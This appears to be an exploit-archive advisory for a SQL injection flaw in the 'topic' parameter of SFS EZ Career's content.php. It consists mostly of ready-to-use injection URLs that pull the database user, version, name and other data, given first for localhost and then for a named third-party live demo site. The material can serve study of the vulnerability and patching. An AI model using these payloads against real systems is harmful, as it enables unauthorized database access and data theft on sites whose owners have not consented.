SFS EZ Career suffers from a SQL injection vulnerability in content.php.
23ab32b0874a7df1bb6a595b9c57f99adabcb5436d09c36697c19741d757ffa7###########################################################################
# Kira has decide be back after halloween
###########################################################################
# Discovered by : Mountassif Moad
# Type Gap : Sql execution
# Script : SFS EZ Career Remote sql execution
# Home Script : http://www.scripts-for-sites.info/item.php?item=92
# Greetz : Allah , All my freind
##########################################################################
Exploit :
http://localhost/[career]/content.php?topic=user()
http://localhost/[career]/content.php?topic=version()
http://localhost/[career]/content.php?topic=database()
http://localhost/[career]/content.php?topic=id
Demo :
http://www.turnkeyzone.com/demos/career/content.php?topic=id
http://www.turnkeyzone.com/demos/career/content.php?topic=version()
http://www.turnkeyzone.com/demos/career/content.php?topic=user()
http://www.turnkeyzone.com/demos/career/content.php?topic=database()
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed